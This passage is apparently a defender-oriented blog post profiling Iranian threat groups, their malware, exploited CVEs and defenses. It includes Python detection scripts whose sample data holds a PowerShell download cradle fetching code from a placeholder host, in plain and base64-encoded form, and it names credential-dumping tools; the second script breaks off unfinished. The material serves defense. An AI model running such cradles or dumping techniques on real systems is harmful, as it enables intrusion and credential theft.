Iranian Threat Actors: What Defenders Need to Know

Picus Labs | 25 MIN READ | March 06, 2026

Geopolitical tensions and kinetic military operations have a well-documented spillover effect into cyberspace. During periods of heightened conflict, security operations centers (SOCs) consistently observe surges in activity from state-sponsored and state-affiliated threat actors, such as increased reconnaissance, credential harvesting campaigns, spear-phishing waves, and in some cases, destructive attacks against critical infrastructure.

Iran's cyber ecosystem is one of the most active and diverse among nation-state threat actors. It comprises a broad constellation of groups operating under different organizational umbrellas, like the Islamic Revolutionary Guard Corps (IRGC), the Ministry of Intelligence and Security (MOIS), and affiliated contractors. Each threat group has its distinct toolsets, targeting profiles, and operational objectives ranging from espionage to disruption to destruction.

In this blog, we explain the most operationally relevant Iranian threat actor groups, their modus operandi, primary targets, malware arsenals, and detection opportunities.

Brief History of Iranian State-Sponsored Threat Actors

Iran's investment in offensive cyber capability accelerated dramatically following the discovery of Stuxnet in 2010, which targeted Iranian nuclear enrichment centrifuges. The attack demonstrated that cyber operations could achieve kinetic-level effects against physical infrastructure and placed Iran firmly in the posture of a nation that needed to develop serious cyber deterrence and offensive capability.

By the mid-2010s, groups now tracked as APT33, APT34, and MuddyWater had surfaced in public reporting. Iranian threat actors distinguished themselves early through an emphasis on social engineering, destructive wiper malware, and targeting of dissident communities abroad. Over time, their capabilities matured significantly from rudimentary web defacement and DDoS operations to sophisticated multi-stage intrusions, cloud-native command-and-control, and large-scale identity attacks against cloud platforms.

Today, Iranian cyber operatives are some of the most active, combining traditional espionage techniques with disruptive strategies.

Profiles of Iranian State-Sponsored Cyber Threat Actors

APT33 (Peach Sandstorm / Elfin / Magnallium / Refined Kitten)

Active Since: 2013 | Attributed To: IRGC

Target Sectors & Regions: Aerospace, defense, satellite, oil and gas, energy, petrochemical, and government. Primary geographic focus on the United States, Saudi Arabia, UAE, South Korea, and Western Europe. The education sector is targeted as an infrastructure procurement vector.

Modus Operandi: APT33 has undergone a significant operational shift. Early campaigns (2013–2019) relied on spear-phishing with recruitment-themed lures, malicious HTML Application (.hta) files, and typosquatting domains impersonating companies like Boeing. Since 2023, the group's primary initial access method has shifted to large-scale password spray attacks against Microsoft 365 and Azure Active Directory (Entra ID) environments, targeting thousands of organizations globally. These attacks are conducted using the go-http-client user agent string and anonymized through TOR exit nodes.

Post-compromise, the group uses SMB for lateral movement, deploys RMM tools (AnyDesk) for persistence, and takes Active Directory snapshots using Sysinternals AD Explorer to map the environment.

A notable 2024 evolution involved the abuse of Microsoft Azure infrastructure. APT33 provisioned fraudulent Azure subscriptions (in some cases using compromised education accounts with Azure for Students entitlements) as C2 nodes, blending malicious traffic with legitimate cloud usage.

Key Malware & Tools:

  • Tickler (2024): Custom multi-stage C/C++ backdoor distributed in ZIP archives using double-extension masquerading (.pdf.exe). Uses PEB traversal to locate kernel32.dll and dynamically resolve APIs, bypassing EDR API hooking. Persists via the Run registry key as SharePoint.exe. C2 is hosted on attacker-controlled Azure subscriptions.
  • FalseFont (2023): Custom backdoor deployed against defense industrial base (DIB) targets following password spray compromise.
  • SHAPESHIFT / STONEDRILL: Destructive wiper with in-memory injection and anti-emulation techniques. Deployed via the DROPSHOT dropper.
  • TURNEDUP: Long-standing custom backdoor from early operations.
  • POWERTON: PowerShell-based modular backdoor for persistent remote access.

Notable CVEs Exploited: CVE-2017-11774 (Microsoft Outlook), CVE-2018-20250 (WinRAR)

Key MITRE ATT&CK Techniques: T1078.004, T1110.003, T1059.001, T1547.001, T1021.002, T1071.001, T1567

APT34 / OilRig (Hazel Sandstorm / Helix Kitten / Earth Simnavaz / Crambus)

Active Since: 2014 | Attributed To: MOIS

Target Sectors & Regions: Government (e.g., Iraq, Jordan, Lebanon, Saudi Arabia), financial services, energy, chemicals, telecommunications, oil and gas, aviation. Operations primarily in the Middle East with campaigns extending to European and U.S. targets.

Modus Operandi: APT34 is one of the most prolific and best-documented Iranian groups. It maintains one of the broadest actively developed toolsets and demonstrates a particular sophistication in C2 architecture, notably DNS tunneling, which is implemented across multiple malware families. The group conducts spear-phishing with document-based malware (malicious macros), exploits public-facing applications, and abuses legitimate cloud services as covert C2 channels.

In 2019, a threat actor using the Telegram persona "Lab Dookhtegan" publicly leaked APT34's tools, including web shell source code, implants, and victim data. The group recovered rapidly, demonstrating significant development capacity by replacing compromised tooling with new families within weeks.

Key Malware & Tools:

  • SideTwist: Native backdoor supporting file upload/download and remote shell execution. Delivered via spear-phishing with macros that extract the trojan to %LOCALAPPDATA%\SystemFailureReporter\, create an update.xml activation switch, and establish persistence via a scheduled task running every five minutes.
  • Saitama: DNS tunneling implant using a finite state machine (FSM) architecture. Employs A, AAAA, and TXT records with base16/base64 encoded payloads. First observed targeting Jordan's foreign ministry (2022).
  • PowerExchange: Exchange server backdoor that uses email as a covert C2 channel. It logs into Exchange with stolen credentials and relays exfiltrated data as attachments through legitimate government Exchange infrastructure.
  • STEALHOOK: Credential theft tool exfiltrating via Microsoft Exchange, observed alongside CVE-2024-30088 exploitation for kernel-level privilege escalation.
  • SC5k / OilCheck / OilBooster / ODAgent: Family of cloud-integrated downloaders using OneDrive and Exchange Online as C2 channels.
  • BONDUPDATER: DNS-based backdoor using TXT records for C2.
  • Karkoff: Lightweight .NET backdoor using Exchange Web Services (EWS) for C2.
  • Menorah: Evolved variant of SideTwist with enhanced evasion (2023).
  • Web Shells: TwoFace, HyperShell, HighShell, RunningBee.
  • Credential Tools: ValueVault, Pickpocket, credential-filter DLLs.

Notable CVEs Exploited: CVE-2017-11882, CVE-2019-0604, CVE-2024-30088

Key MITRE ATT&CK Techniques: T1071.004, T1059.001, T1053.005, T1114.002, T1567, T1505.003, T1003

APT35 / Magic Hound / Charming Kitten (Mint Sandstorm / TA453 / PHOSPHORUS)

Active Since: 2013 | Attributed To: IRGC

Target Sectors & Regions: Think tanks, academic researchers (nuclear policy, Middle Eastern affairs, foreign policy), journalists, political dissidents, diplomats, government officials, human rights activists, dual nationals. Also targets U.S. critical infrastructure (seaports, energy, transit, utilities) and defense industrial base. Geographic focus on the United States, Europe, the Middle East (particularly Israel), and India.

Modus Operandi: APT35 is arguably the most publicly visible Iranian group due to its extensive and sophisticated social engineering. The group constructs elaborate fake personas on social media, impersonating journalists (including real individuals at institutions like the Brookings Institution), conference organizers, and academics. Engagements often involve weeks-long email exchanges to build rapport before introducing a malicious link or document. Recent campaigns have used GenAI to create polished malicious PDFs impersonating organizations like RAND Corporation.

Their credential harvesting infrastructure impersonates Google, Microsoft, Yahoo, and institutional login pages and is capable of intercepting MFA tokens, enabling account takeover even with MFA enabled.

Key Malware & Tools:

  • POWERSTAR / CharmPower: Fully-featured modular PowerShell backdoor with remote execution, persistence management, screenshot capture, process enumeration, file search, and a cleanup module. The 2023 variant decouples the decryption key from the C2 server and retrieves C2 addresses from the decentralized IPFS filesystem for infrastructure resilience.
  • BellaCiao: Custom .NET dropper with a novel C2 mechanism. Each sample is individually tailored to its target with hardcoded company names, subdomains, and IP addresses. C2 operates via DNS resolution: the resolved IP's last octet encodes commands (deploy web shell, deploy Plink proxy, or remove artifacts). Immediately attempts to disable Microsoft Defender on deployment.
  • GorjolEcho / NokNok: Windows PowerShell backdoor (GorjolEcho); when a target was identified as a macOS user, the group rapidly developed a Mac-native variant (NokNok) masquerading as a VPN solution.
  • HYPERSCRAPE: Custom email extraction tool that systematically downloads the contents of a target's inbox.
  • PowerLess: PowerShell-based implant observed in multi-tool campaigns.
  • BASICSTAR / Sponsor: Additional backdoors in recent campaigns.

Notable CVEs Exploited: CVE-2021-44228 (Log4Shell), CVE-2022-47966 (Zoho ManageEngine), ProxyShell chain (CVE-2021-34473/34523/31207), ProxyLogon (CVE-2021-26855)

Key MITRE ATT&CK Techniques: T1566.001, T1566.002, T1598, T1059.001, T1071.001, T1071.004, T1102, T1114

APT42

Active Since: ~2015 | Attributed To: IRGC

Target Sectors & Regions: Journalists, researchers, NGOs, members of the Iranian diaspora, government officials, dissidents. Stealthy, low-volume, narrowly scoped campaigns suggesting a focus on human intelligence collection rather than mass-scale espionage.

Modus Operandi: APT42 represents a specialized surveillance capability within the Iranian APT ecosystem. The group conducts targeted spear-phishing campaigns against individuals deemed adversarial to the regime, uses cloud-based platforms and mobile spyware, and deploys credential phishing to monitor dissident activity. Its campaigns are notably stealthy and carefully scoped, distinguishing it from the broader espionage operations of groups like APT35.

Key MITRE ATT&CK Techniques: T1566, T1598, T1102, T1114

APT39 (Remix Kitten / Chafer)

Active Since: ~2014 | Attributed To: MOIS

Target Sectors & Regions: Telecommunications, travel, and IT services. Geographic focus on the Middle East, with operations extending to the United States, Europe, and Asia.

Modus Operandi: APT39 is primarily focused on personal information collection at scale, likely in support of Iranian intelligence tracking of individuals. The group uses spear-phishing and watering hole attacks for initial access, and is known for deploying modified Mimikatz variants for credential harvesting. Telecommunications targeting suggests a capability to enable surveillance of individuals through carrier-level access.

Key MITRE ATT&CK Techniques: T1566, T1071, T1003

MuddyWater (Mango Sandstorm / Seedworm / TA450 / TEMP.Zagros / Static Kitten)

Active Since: 2017 | Attributed To: MOIS

Target Sectors & Regions: Government agencies, defense contractors, energy, telecommunications, financial institutions, academia. Primary focus on the Middle East (Israel, Turkey, Saudi Arabia, Jordan, Iraq, UAE), North Africa (Egypt, Sudan, Tanzania), Central/South Asia, and EMEA. Recent 2025 campaigns also targeted U.S. manufacturing and transportation.

Modus Operandi: MuddyWater is one of the most operationally active Iranian groups and is distinctive for its heavy reliance on PowerShell at every stage of the kill chain, combined with living-off-the-land binary (LOLBin) abuse of mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe. The group extensively abuses legitimate Remote Monitoring and Management (RMM) tools for post-compromise access, cycling regularly between platforms.

Spear-phishing is conducted using both custom campaigns and compromised email accounts. Recent campaigns distribute links to malicious files hosted on cloud storage platforms (OneHub, Sync, Egnyte, TeraBox) using password-protected archives to evade email security scanning.

C2 Framework Evolution (chronological):

  • POWERSTATS → MuddyC3 (Python 2) → PhonyC2 (Python 3, source code leaked) → MuddyC2Go (Golang) → DarkBeatC2 (current, identified early 2024)

Key Malware & Tools:

  • Phoenix Backdoor (2025): Lightweight implant deployed via FakeUpdate injector. Persistence via Winlogon registry modifications.
  • Custom Chromium-Based Credential Stealer (2025): Targets Chrome, Opera, Brave, and Edge. Extracts encrypted keys from Local State files, terminates browser processes, decrypts login data, and stages output to C:\Users\Public\Downloads\cobe-notes.txt.
  • RMM Tool Abuse: Atera Agent, ConnectWise ScreenConnect, SimpleHelp, N-able, MeshCentral, PDQ, and Action1.
  • Open-Source Tools: LaZagne, Chisel, PLink, FRP (Fast Reverse Proxy), Ligolo.

Notable CVEs Exploited: CVE-2020-1472 (Zerologon), CVE-2023-27350 (PaperCut), Exchange ProxyShell chain

Key MITRE ATT&CK Techniques: T1059.001, T1219, T1566.001, T1566.002, T1218.005, T1105, T1547.004, T1003

Agrius (Pink Sandstorm / Agonizing Serpens)

Active Since: 2020 | Attributed To: MOIS

Target Sectors & Regions: Israeli organizations across education, technology, and the broader private sector. Operations are primarily destructive in intent.

Modus Operandi: Agrius represents the convergence of espionage and destructive operations. The group typically conducts data theft and exfiltration before deploying destructive payloads, maximizing both intelligence value and disruptive impact. Its defining characteristic is the deployment of wipers disguised as ransomware, a tactic that complicates initial incident triage. Responders may initially classify incidents as cybercriminal ransomware before recognizing their state-aligned, destructive nature.

Key Malware & Tools:

  • Apostle: Initially deployed as a non-functional ransomware facade over a wiper. Later evolved into functional ransomware.
  • Fantasy Wiper: File-level wiper targeting Israeli organizations.
  • BFG Agonizer / MultiLayer Wipers: Additional wiper variants (2023).
  • IPsec Helper: Custom backdoor for persistent access.
  • Custom ASP.NET Web Shells: Persistent footholds on compromised web servers.

Key MITRE ATT&CK Techniques: T1485, T1486, T1505.003, T1041

Fox Kitten (Pioneer Kitten / Parisite / UNC757)

Active Since: ~2017 | Attributed To: IRGC

Target Sectors & Regions: Broad targeting across technology, government, defense, healthcare, and financial sectors. Operates as an initial access broker, providing footholds to downstream Iranian groups.

Modus Operandi: Fox Kitten specializes in exploiting edge infrastructure like VPN appliances, Citrix gateways, and remote desktop solutions to establish persistent footholds in corporate networks. The group has been observed operating at the intersection of espionage and cybercrime, offering affiliates an 80% share of ransom proceeds for attacks against Iran's adversaries. It has reportedly shared or sold access to other Iranian APTs, making it a critical enabler in Iran's offensive cyber ecosystem.

Tools: SSH tunneling, Mimikatz, custom web shells, open-source post-exploitation frameworks.

Key MITRE ATT&CK Techniques: T1190, T1133, T1003, T1021

Tortoiseshell / IMPERIAL KITTEN (Crimson Sandstorm / UNC1549)

Active Since: ~2018 | Attributed To: IRGC

Target Sectors & Regions: IT service providers, supply chain entities connected to defense and energy sectors in the Middle East. Also active against defense, aerospace, telecommunications, and regional government entities.

Modus Operandi: Tortoiseshell targets IT service providers and supply chain entities to pivot into higher-value organizations through trusted relationships. The group uses both custom and commodity tools, watering hole campaigns, and job-themed lures as delivery mechanisms. Some campaigns have indicated collaboration or overlap with other Iranian APT clusters.

Key Tools: IMAPLoader backdoor, SYSKIT, IMAPlibrary.

Key MITRE ATT&CK Techniques: T1195, T1566, T1071

HomeLand Justice (DEV-0270 / Nemesis Kitten)

Active Since: ~2021 | Attributed To: IRGC

Target Sectors & Regions: Government agencies, critical infrastructure, public services. The most notable operation targeted Albanian government infrastructure (2022), which led to a diplomatic rupture between Albania and Iran.

Modus Operandi: HomeLand Justice combines ransomware tactics with hacktivist branding. It typically exfiltrates data before deploying encryption or wiper payloads, then leaks stolen data on dedicated websites and social media. The 2022 Albania campaign used Exchange (ProxyShell) and SharePoint for initial access, followed by deployment of three payloads: ROADSWEEP (file wiper), CHIMNEYSWEEP (information-stealing backdoor), and ZEROCLEAR (MBR wiper using EldoS RawDisk driver).

Key Malware: ROADSWEEP, CHIMNEYSWEEP, ZEROCLEAR

Key MITRE ATT&CK Techniques: T1190, T1485, T1486, T1041

CyberAv3ngers

Active Since: ~2020 | Attributed To: IRGC

Target Sectors & Regions: Industrial control systems (ICS) and operational technology (OT), particularly internet-connected programmable logic controllers (PLCs) and human-machine interfaces (HMIs). Gained attention for targeting U.S. water and wastewater infrastructure.

Modus Operandi: CyberAv3ngers blurs the line between hacktivist activism and state-sponsored operations. The group focuses on Unitronics Vision Series PLCs with default credentials, targeting OT environments that are often less well-monitored than IT networks. Public messaging and timing align closely with Iranian geopolitical interests.

Key MITRE ATT&CK Techniques: T1078, T1059, T0810, T0866

Moses Staff / Abraham's Ax

Active Since: 2021 | Attributed To: IRGC

Target Sectors & Regions: Primarily Israeli public and private sector entities.

Modus Operandi: Moses Staff targets Israeli organizations with a mix of data theft, encryption, and ideological propaganda. The group publishes victim information and inflammatory statements via Telegram and other channels, making cyber-enabled influence operations a core component of its activity. Abraham's Ax is assessed as a secondary persona for the same operational group, used for specific campaigns.

Key Tools: DCSrv wiper, StrifeWater RAT, PyDCrypt

DEV-1084

Active Since: ~2022 | Attributed To: Iranian nexus

Target Sectors & Regions: Organizations across multiple sectors, particularly those with significant cloud presence.

Modus Operandi: DEV-1084 is notable for conducting highly destructive post-compromise operations. Following initial access (often provided by Fox Kitten), the group performs large-scale destruction of cloud resources, such as deleting virtual machines, storage accounts, and virtual networks, causing maximum operational disruption. This model of initial access brokering combined with destructive follow-on operations illustrates the modular, collaborative nature of Iran's cyber ecosystem.

Emennet Pasargad

Active Since: ~2018 | Attributed To: IRGC

Target Sectors & Regions: U.S. and Israeli election infrastructure, media organizations, and entities related to political processes.

Modus Operandi: Emennet Pasargad is primarily known for cyber-enabled influence operations targeting elections and public discourse. The group has conducted hack-and-leak operations, website defacements, and distributed fabricated content to influence public perception. OFAC has designated the group for its interference activities.

GreenCharlie

Active Since: ~2023 (public reporting) | Attributed To: Iranian nexus

Target Sectors & Regions: Regional governments and defense sectors in the Middle East.

Modus Operandi: GreenCharlie is a relatively newer cluster in public reporting. Available evidence suggests it conducts cyber espionage aligned with Iranian state interests. Campaigns appear focused on targeted intrusions against government and defense organizations. Attribution analysis is still ongoing across vendors.

DarkHydrus

Active Since: ~2016 | Attributed To: Iranian nexus

Target Sectors & Regions: Government agencies and educational institutions in the Middle East.

Modus Operandi: DarkHydrus is known for its use of open-source red team tools and DNS tunneling for C2 communication. The group leverages phishing with malicious Office documents and has used the RogueRobin implant, which communicates via DNS TXT records. Overlaps with OilRig in infrastructure and techniques have been noted by researchers.

Hexane (Lyceum / Siamesekitten)

Active Since: ~2017 | Attributed To: MOIS

Target Sectors & Regions: Oil and gas, telecommunications, and internet service providers primarily in the Middle East and Africa.

Modus Operandi: Hexane/Lyceum targets critical infrastructure providers with a focus on telecommunications and energy. Initial access relies on spear-phishing with malicious documents. Post-compromise activity includes credential harvesting and DNS tunneling for C2. The group's targeting of ISPs and telcos suggests an interest in enabling downstream surveillance capabilities.

MalKamak

Active Since: ~2018 | Attributed To: Iranian nexus

Target Sectors & Regions: Aerospace and telecommunications sectors primarily in the Middle East, Europe, Russia, and the United States.

Modus Operandi: MalKamak conducts targeted espionage operations and is notable for the ShellClient RAT, which uses Dropbox as a C2 channel consistent with the broader Iranian APT trend of abusing legitimate cloud services. The group maintains a low operational profile and conducts infrequent but carefully targeted intrusions.

xHunt

Active Since: ~2018 | Attributed To: Iranian nexus

Target Sectors & Regions: Kuwaiti government and shipping/transportation organizations.

Modus Operandi: xHunt targets Kuwaiti entities using tools that communicate via DNS tunneling and email-based C2. The group uses custom tools, including BumbleBee (DNS tunneling) and EYE (email-based backdoor), with C2 traffic designed to blend with normal organizational communications.

UNC3890

Active Since: ~2020 | Attributed To: Iranian nexus

Target Sectors & Regions: Israeli organizations across shipping, government, energy, aviation, and healthcare.

Modus Operandi: UNC3890 uses watering hole attacks and spear-phishing to target Israeli entities. The group deploys two primary tools: SUGARUSH (small backdoor) and SUGARDUMP (credential harvesting tool targeting browser-stored credentials). Lures have included fake job postings and shipping/logistics-themed content tailored to the Israeli market.

Cross-Group Technical Analysis of Iranian APT Groups

Initial Access

  • Spear-phishing remains the most common vector. Document-based chains typically follow the pattern: malicious macro → encoded PowerShell download cradle → payload retrieval from cloud hosting or attacker infrastructure. APT35 and APT34 construct elaborate multi-stage social engineering sequences; MuddyWater favors direct delivery of RMM agent installers in password-protected archives.
  • Password Spraying has become APT33's primary initial access method since 2023, targeting Microsoft 365 and Entra ID at scale using go-http-client through TOR exit nodes.
  • Supply Chain Compromise: MuddyWater compromised the Israeli IT provider "Rashim" to gain access to downstream organizations. Fox Kitten targets VPN appliances and MSPs for initial footholds.
  • Exploitation of Public-Facing Applications is rapid and consistent across groups. The table below summarizes key CVEs:

CVE            | Product                          | Groups
CVE-2017-11774 | Microsoft Outlook                | APT33
CVE-2017-11882 | Microsoft Office Equation Editor | APT34
CVE-2018-13379 | Fortinet FortiOS                 | Multiple
CVE-2019-11510 | Pulse Secure VPN                 | Multiple
CVE-2019-19781 | Citrix ADC/Gateway               | Multiple
CVE-2020-1472  | Windows Netlogon (Zerologon)     | MuddyWater
CVE-2021-26855 | Exchange ProxyLogon              | APT35, HomeLand Justice
CVE-2021-34473 | Exchange ProxyShell              | APT35, HomeLand Justice
CVE-2021-44228 | Apache Log4j                     | APT35
CVE-2022-47966 | Zoho ManageEngine                | APT35
CVE-2023-27350 | PaperCut                         | MuddyWater
CVE-2024-30088 | Windows Kernel                   | APT34

Execution & Persistence

PowerShell is the single most common execution engine across all Iranian groups. Techniques include encoded commands (-EncodedCommand), download cradles (IEX (New-Object Net.WebClient).DownloadString()), and custom PowerShell backdoors. MuddyWater treats PowerShell as a foundational capability at every kill chain stage.
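To show how the encoded-command and download-cradle patterns just described can be surfaced from telemetry, here is an added Python example written for this post (it is not code from the original article or from any vendor product): it decodes a -EncodedCommand argument from its base64/UTF-16LE form and scores process command lines and 4104 script-block text against a small indicator list. The sample events, the indicator names and the .invalid URL are constructed assumptions.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators of the download-cradle pattern described above. IEX alone is common in
# admin scripts, so a finding needs at least two indicators to be reported.
CRADLE_PATTERNS = {
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "net_webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "download_call": re.compile(r"\.Download(String|File|Data)\s*\(", re.I),
    "from_base64": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
}
# -EncodedCommand and the abbreviated forms PowerShell accepts, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    source: str          # telemetry source, e.g. "4688" (process creation) or "4104" (script block)
    analyzed_text: str   # what the indicators were matched against, decoded where applicable
    indicators: List[str]

    @property
    def score(self) -> int:
        return len(self.indicators)


def decode_encoded_command(text: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script; return the plain script or None."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(source: str, text: str, min_score: int = 2) -> Optional[Finding]:
    """Decode an encoded command when present, then match the indicators on the plain script."""
    indicators: List[str] = []
    body = text
    decoded = decode_encoded_command(text)
    if decoded is not None:
        indicators.append("encoded_command")
        body = text + "\n" + decoded  # keep the launcher flags (-nop, -w hidden) in view as well
    indicators += [name for name, pat in CRADLE_PATTERNS.items() if pat.search(body)]
    if len(indicators) < min_score:
        return None
    return Finding(source, body, indicators)


def scan_events(events: List[dict]) -> List[Finding]:
    """events: dicts with 'source' and 'text' (a command line or a script block)."""
    hits = []
    for ev in events:
        finding = analyze(ev["source"], ev["text"])
        if finding is not None:
            hits.append(finding)
    return hits


# Constructed sample telemetry, not real events: the cradle from the text launched through
# an encoded command with a hidden window, the same cradle logged in plain text by script
# block logging, and a benign admin one-liner. The URL is a placeholder.
CRADLE_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/update.txt')"
ENCODED_SAMPLE = base64.b64encode(CRADLE_SAMPLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"source": "4688", "text": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}"},
    {"source": "4104", "text": CRADLE_SAMPLE},
    {"source": "4104", "text": "Get-Service | Where-Object Status -eq 'Running'"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.source}] score={f.score} indicators={f.indicators}")
```

Decoding before matching is the point: a rule that only inspects the raw command line never sees the IEX or DownloadString strings hidden inside the base64 blob.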

LOLBin Abuse: Commonly abused binaries include mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe for execution, defense evasion, and payload delivery.

Persistence Mechanisms:

  • Scheduled tasks (APT34's SystemFailureReporter pattern runs every 5 minutes)
  • Registry Run keys (APT33's SharePoint.exe, MuddyWater's Winlogon Helper DLL modifications)
  • Windows services and DLL side-loading
  • IIS modules (APT35 deploying modules for instruction processing and exfiltration)

Command & Control

  • DNS Tunneling: APT34's signature technique, implemented across BONDUPDATER, Saitama, and other tools using A, AAAA, TXT, and MX records with base16/base64 encoded payloads. DarkHydrus and xHunt also leverage DNS tunneling.
  • Cloud Service Abuse: An accelerating trend across all major groups. APT34 uses OneDrive and Exchange Online; APT35 leverages Dropbox, Google Drive, Backblaze, and IPFS; MuddyWater abuses Telegram API and cloud storage platforms; APT33 abuses Azure infrastructure directly. MalKamak uses Dropbox. This technique exploits the implicit trust organizations place in cloud service traffic.
  • Custom C2 Frameworks: MuddyWater operates the most sophisticated custom C2 ecosystem: POWERSTATS → MuddyC3 → PhonyC2 → MuddyC2Go → DarkBeatC2.

Credential Access

  • LSASS Dumping: Mimikatz, comsvcs.dll, MiniDump, ProcDump. APT39 uses modified Mimikatz variants.
  • Kerberoasting / AS-REP Roasting: APT33 and APT34 post-compromise activity.
  • Browser Credential Theft: MuddyWater's custom Chromium-based stealer targets Chrome, Opera, Brave, and Edge.
  • MFA Token Interception: APT35's credential harvesting kits intercept MFA codes, enabling account takeover despite MFA enablement.
  • Exchange-Based Exfiltration: APT34's STEALHOOK and PowerExchange use Exchange as both a credential store and exfiltration channel.

Prioritized Defensive Actions Against Iranian APT Groups

Based on observed TTP frequency across Iranian threat groups, the following defensive actions are advised.

  1. Enforce phishing-resistant MFA on all externally-facing services. Use FIDO2/hardware keys for high-value accounts. Monitor Entra ID sign-in logs for password spray patterns (high failure volume, go-http-client user agent, TOR exit node IPs).
  2. Patch internet-facing appliances within 48 hours of critical vulnerability disclosure. Exchange, VPN gateways, Citrix, ManageEngine, and PaperCut are consistent targets.
  3. Enable comprehensive PowerShell logging, such as Script Block Logging (Event ID 4104), Module Logging, and Transcription Logging. Deploy behavioral detections for suspicious PowerShell patterns. This provides coverage across virtually all Iranian threat clusters.
  4. Monitor for unauthorized RMM tool installation, particularly AnyDesk, ScreenConnect, SimpleHelp, MeshCentral, and Action1 spawned from PowerShell, cmd, or mshta parent processes.
  5. Implement DNS query logging and anomaly detection to flag high volumes of TXT/MX record queries, elevated subdomain entropy, and unusual DNS beaconing intervals.
  6. Harden Active Directory against credential theft, enable LSASS protection (PPL), deploy Kerberoasting detection, and audit Mimikatz-indicative access patterns (GrantedAccess: 0x1010, 0x1410, 0x1438).
  7. Audit Azure/M365 subscription and resource provisioning; unauthorized Azure subscription creation is an APT33 tradecraft indicator.
  8. Educate high-risk users, like researchers, policy experts, journalists, executives, and dual nationals, who are disproportionately targeted by APT35 and APT42 social engineering. Awareness of long-horizon rapport-building tactics is critical.
  9. Treat ransomware in targeted sectors as a potential wiper, always preserve forensic evidence, and validate data integrity before assuming criminal ransomware intent.
  10. Inventory and monitor internet-facing OT/ICS devices. CyberAv3ngers targets PLCs with default credentials. Remove default credentials and segment OT networks from internet exposure.
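To make item 1 concrete, here is an added Python example (written for this post, not code from the original article or from Microsoft) that looks for the password-spray pattern described in the APT33 profile in exported Entra ID sign-in records: one source IP failing against many distinct accounts with only a few attempts each inside a short window, enriched with the go-http-client user agent and a TOR exit-node match. The JSON field names are trimmed from the sign-in log schema, the TOR list is a single constructed address standing in for whatever feed the organization ingests, and all sample events and thresholds are constructed assumptions.

```python
import json
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Set

# Assumptions, none from the original post: a TOR exit list loaded from the organization's
# own feed (one constructed address here) and sign-in records exported as a JSON array.
TOR_EXIT_NODES: Set[str] = {"198.51.100.23"}
SPRAY_USER_AGENT_PREFIXES = ("go-http-client",)   # the user agent named in the APT33 profile
ERROR_INVALID_PASSWORD = 50126                    # Entra ID: invalid username or password


@dataclass
class SprayAlert:
    ip: str
    window_start: datetime
    failures: int
    distinct_users: int
    successes_after_failure: List[str]
    indicators: List[str]


def parse_signins(raw_json: str) -> List[dict]:
    """Parse a JSON array of sign-in records and attach a timezone-aware datetime to each."""
    events = json.loads(raw_json)
    for e in events:
        e["ts"] = datetime.fromisoformat(e["createdDateTime"].replace("Z", "+00:00"))
    return sorted(events, key=lambda e: e["ts"])


def detect_spray(events: List[dict], window_minutes: int = 10, min_distinct_users: int = 10,
                 max_failures_per_user: int = 3) -> List[SprayAlert]:
    """Flag an IP that fails against many distinct accounts, a few tries each, in one window.

    Spraying is wide and shallow (many users, few attempts per user); a deep run of failures
    against one account is brute force and is deliberately left to a different rule.
    """
    window_s = window_minutes * 60
    buckets: Dict[tuple, List[dict]] = defaultdict(list)
    for e in events:  # tumbling windows keyed by (ip, window index); events are time-ordered
        buckets[(e["ipAddress"], int(e["ts"].timestamp() // window_s))].append(e)

    alerts: List[SprayAlert] = []
    for (ip, slot), evs in sorted(buckets.items()):
        failures_per_user: Dict[str, int] = defaultdict(int)
        success_after: List[str] = []
        for e in evs:
            user = e["userPrincipalName"].lower()
            if e["status"]["errorCode"] == 0:
                if failures_per_user[user] > 0:      # a hit after misses on the same account
                    success_after.append(user)
            else:
                failures_per_user[user] += 1
        failed_users = [u for u, n in failures_per_user.items() if n > 0]
        if len(failed_users) < min_distinct_users:
            continue
        if max(failures_per_user[u] for u in failed_users) > max_failures_per_user:
            continue

        indicators = []
        if ip in TOR_EXIT_NODES:
            indicators.append("tor_exit_node")
        if any(e["userAgent"].lower().startswith(SPRAY_USER_AGENT_PREFIXES) for e in evs):
            indicators.append("spray_user_agent")
        if success_after:
            indicators.append("success_after_spray")
        alerts.append(SprayAlert(
            ip=ip,
            window_start=datetime.fromtimestamp(slot * window_s, tz=timezone.utc),
            failures=sum(failures_per_user.values()),
            distinct_users=len(failed_users),
            successes_after_failure=success_after,
            indicators=indicators,
        ))
    return alerts


def record(ts: datetime, user: str, ip: str, ua: str, code: int) -> dict:
    """Build one constructed sign-in record in the trimmed export shape used above."""
    return {"createdDateTime": ts.strftime("%Y-%m-%dT%H:%M:%SZ"), "userPrincipalName": user,
            "ipAddress": ip, "userAgent": ua, "status": {"errorCode": code}}


# Constructed sample export (not real telemetry): a spray of 12 accounts from one TOR address,
# one wrong password each 20 s apart, ending in a successful login to the last account, plus a
# normal user who mistypes twice and then signs in from a browser.
T0 = datetime(2026, 3, 6, 9, 0, 0, tzinfo=timezone.utc)
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
SAMPLE_SIGNINS = json.dumps(
    [record(T0 + timedelta(seconds=20 * i), f"user{i:02d}@corp.example", "198.51.100.23",
            "Go-http-client/1.1", ERROR_INVALID_PASSWORD) for i in range(12)]
    + [record(T0 + timedelta(seconds=260), "user11@corp.example", "198.51.100.23",
              "Go-http-client/1.1", 0)]
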